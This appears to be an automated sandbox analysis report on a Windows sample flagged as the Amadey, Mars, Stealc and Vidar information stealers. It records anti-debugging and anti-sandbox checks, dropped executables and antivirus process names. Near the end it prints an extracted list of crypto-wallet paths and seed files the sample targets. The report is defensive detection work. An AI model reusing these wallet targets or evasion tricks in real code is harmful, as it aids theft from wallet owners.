Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: DGDBFBFC.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: DGDBFBFC.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: DGDBFBFC.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.00000000007D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: DGDBFBFC.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: DGDBFBFC.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: DGDBFBFC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: DGDBFBFC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: DGDBFBFC.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: DGDBFBFC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: DGDBFBFC.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: DGDBFBFC.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VBoxService.exe
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VMWare
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Code function: 7_2_05130BD8 rdtsc 7_2_05130BD8
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C375FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C375FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C37C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C37C410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00355C0B mov eax, dword ptr fs:[00000030h] 9_2_00355C0B
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_00359972 mov eax, dword ptr fs:[00000030h] 9_2_00359972
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C34B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C34B66C
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C34B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C34B1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe" Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCAAEGIJKE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe "C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C34B341 cpuid 0_2_6C34B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3135A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C3135A0
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.5.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 15.2.explortu.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explortu.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.HIIEBAFCBK.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explortu.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.explortu.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explortu.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explortu.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000003.2377175817.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.4529146618.0000000000321000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2330410037.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3931226693.0000000000321000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2423428017.0000000000321000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.4488473362.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2689256533.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2729842906.0000000000321000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4582173269.0000000000321000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.3890454750.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3332406854.0000000000321000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2374235761.0000000000C81000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2383183776.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.3292182479.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2305011823.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2304071459.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tAa6xNsucX.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.tAa6xNsucX.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2305011823.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tAa6xNsucX.exe PID: 6532, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
